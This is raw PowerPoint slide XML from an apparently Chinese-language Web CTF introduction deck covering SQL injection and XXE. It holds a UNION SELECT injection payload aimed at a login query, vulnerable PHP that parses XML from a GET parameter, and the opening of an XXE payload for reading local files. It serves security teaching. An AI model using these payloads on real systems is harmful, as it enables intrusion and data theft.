          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>注入简介：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D06C94AD-9220-304C-89BD-6B26D9194686}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="1810265"/>
            <a:ext cx="7711440" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  类似的，构造其它语句，还可查询数据库中的其它数据（假设</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表有</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>列）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C5B14C7-7543-3A4E-A1A9-775D1E2C9DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="3324699"/>
            <a:ext cx="11094720" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> username</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> user</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#</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 and pwd='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="24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332601378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4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>例子：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A32181F-B905-224C-8C22-D5635D352424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3618230" y="5181600"/>
            <a:ext cx="9535160" cy="597856"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入，简单的过滤了一些函数</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE4E77FE-2E9C-CD4C-9D15-B497329095C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="8539" r="13957" b="16758"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981199" y="1514416"/>
            <a:ext cx="8467725" cy="3667184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210006345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7152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387" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>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791510" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2902083" y="2437587"/>
            <a:ext cx="1762771" cy="1641349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="10665" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="10665">
              <a:solidFill>
                <a:srgbClr val="17307F"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="矩形 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4780030" y="2888929"/>
            <a:ext cx="4966735" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="4800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="4800" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="4800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>CTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="4800" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="17307F"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342954941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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="4*#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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3749040" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>简介：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0805F42D-65AA-4D42-885A-433475FB4CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1432560" y="3437096"/>
            <a:ext cx="8839200" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>simplexml_load_string</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_GET</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xml</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r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print_r</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string</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xml</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endParaRPr lang="en" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{709B080C-A7BE-8644-AEAE-CCAAFA639A1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="2014090"/>
            <a:ext cx="3566160" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>后端获取一个</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文档：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"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283706090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3749040" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>简介：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{709B080C-A7BE-8644-AEAE-CCAAFA639A1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="2014090"/>
            <a:ext cx="3566160" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>读取本地文件</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C229197-2194-CA4F-B04F-16773F3C438A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="3103156"/>
            <a:ext cx="8138160" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8190A0"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="91B3E0"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</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1.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8190A0"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="91B3E0"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</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utf-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOCTYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
